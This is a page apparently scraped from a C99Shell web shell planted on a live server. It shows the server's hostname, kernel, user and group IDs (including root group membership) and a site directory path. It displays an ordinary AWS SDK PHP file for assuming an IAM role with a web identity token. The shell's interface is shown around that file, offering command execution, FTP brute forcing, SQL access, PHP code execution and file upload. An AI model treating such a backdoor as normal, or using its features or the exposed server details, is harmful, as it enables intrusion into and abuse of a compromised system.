!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/aws/aws-sdk-php/src/Credentials/   drwxr-xr-x
Free 28.49 GB of 117.98 GB (24.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AssumeRoleWithWebIdentityCredentialProvider.php (5.97 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Aws\Credentials;

use 
Aws\Exception\AwsException;
use 
Aws\Exception\CredentialsException;
use 
Aws\Result;
use 
Aws\Sts\StsClient;
use 
GuzzleHttp\Promise;

/**
 * Credential provider that provides credentials via assuming a role with a web identity
 * More Information, see: https://docs.aws.amazon.com/aws-sdk-php/v3/api/api-sts-2011-06-15.html#assumerolewithwebidentity
 */
class AssumeRoleWithWebIdentityCredentialProvider
{
    const 
ERROR_MSG "Missing required 'AssumeRoleWithWebIdentityCredentialProvider' configuration option: ";
    const 
ENV_RETRIES 'AWS_METADATA_SERVICE_NUM_ATTEMPTS';

    
/** @var string */
    
private $tokenFile;

    
/** @var string */
    
private $arn;

    
/** @var string */
    
private $session;

    
/** @var StsClient */
    
private $client;

    
/** @var integer */
    
private $retries;

    
/** @var integer */
    
private $authenticationAttempts;

    
/** @var integer */
    
private $tokenFileReadAttempts;

    
/**
     * The constructor attempts to load config from environment variables.
     * If not set, the following config options are used:
     *  - WebIdentityTokenFile: full path of token filename
     *  - RoleArn: arn of role to be assumed
     *  - SessionName: (optional) set by SDK if not provided
     *
     * @param array $config Configuration options
     * @throws \InvalidArgumentException
     */
    
public function __construct(array $config = [])
    {
        if (!isset(
$config['RoleArn'])) {
            throw new 
\InvalidArgumentException(self::ERROR_MSG "'RoleArn'.");
        }
        
$this->arn $config['RoleArn'];

        if (!isset(
$config['WebIdentityTokenFile'])) {
            throw new 
\InvalidArgumentException(self::ERROR_MSG "'WebIdentityTokenFile'.");
        }
        
$this->tokenFile $config['WebIdentityTokenFile'];

        if (!
preg_match("/^\w\:|^\/|^\\\/"$this->tokenFile)) {
            throw new 
\InvalidArgumentException("'WebIdentityTokenFile' must be an absolute path.");
        }

        
$this->retries = (int) getenv(self::ENV_RETRIES) ?: (isset($config['retries']) ? $config['retries'] : 3);
        
$this->authenticationAttempts 0;
        
$this->tokenFileReadAttempts 0;

        
$this->session = isset($config['SessionName'])
            ? 
$config['SessionName']
            : 
'aws-sdk-php-' round(microtime(true) * 1000);

        
$region = isset($config['region'])
            ? 
$config['region']
            : 
'us-east-1';

        if (isset(
$config['client'])) {
            
$this->client $config['client'];
        } else {
            
$this->client = new StsClient([
                
'credentials' => false,
                
'region' => $region,
                
'version' => 'latest'
            
]);
        }
    }

    
/**
     * Loads assume role with web identity credentials.
     *
     * @return Promise\PromiseInterface
     */
    
public function __invoke()
    {
        return 
Promise\Coroutine::of(function () {
            
$client $this->client;
            
$result null;
            while (
$result == null) {
                try {
                    
$token = @file_get_contents($this->tokenFile);
                    if (
false === $token) {
                        
clearstatcache(truedirname($this->tokenFile) . "/" readlink($this->tokenFile));
                        
clearstatcache(truedirname($this->tokenFile) . "/" dirname(readlink($this->tokenFile)));
                        
clearstatcache(true$this->tokenFile);
                        if (!@
is_readable($this->tokenFile)) {
                            throw new 
CredentialsException(
                                
"Unreadable tokenfile at location {$this->tokenFile}"
                            
);
                        }

                        
$token = @file_get_contents($this->tokenFile);
                    }
                    if (empty(
$token)) {
                        if (
$this->tokenFileReadAttempts $this->retries) {
                            
sleep((int) pow(1.2$this->tokenFileReadAttempts));
                            
$this->tokenFileReadAttempts++;
                            continue;
                        }
                        throw new 
CredentialsException("InvalidIdentityToken from file: {$this->tokenFile}");
                    }
                } catch (
\Exception $exception) {
                    throw new 
CredentialsException(
                        
"Error reading WebIdentityTokenFile from " $this->tokenFile,
                        
0,
                        
$exception
                    
);
                }

                
$assumeParams = [
                    
'RoleArn' => $this->arn,
                    
'RoleSessionName' => $this->session,
                    
'WebIdentityToken' => $token
                
];

                try {
                    
$result $client->assumeRoleWithWebIdentity($assumeParams);
                } catch (
AwsException $e) {
                    if (
$e->getAwsErrorCode() == 'InvalidIdentityToken') {
                        if (
$this->authenticationAttempts $this->retries) {
                            
sleep((int) pow(1.2$this->authenticationAttempts));
                        } else {
                            throw new 
CredentialsException(
                                
"InvalidIdentityToken, retries exhausted"
                            
);
                        }
                    } else {
                        throw new 
CredentialsException(
                            
"Error assuming role from web identity credentials",
                            
0,
                            
$e
                        
);
                    }
                } catch (
\Exception $e) {
                    throw new 
CredentialsException(
                        
"Error retrieving web identity credentials: " $e->getMessage()
                        . 
" (" $e->getCode() . ")"
                    
);
                }
                
$this->authenticationAttempts++;
            }

            yield 
$this->client->createCredentials($result);
        });
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--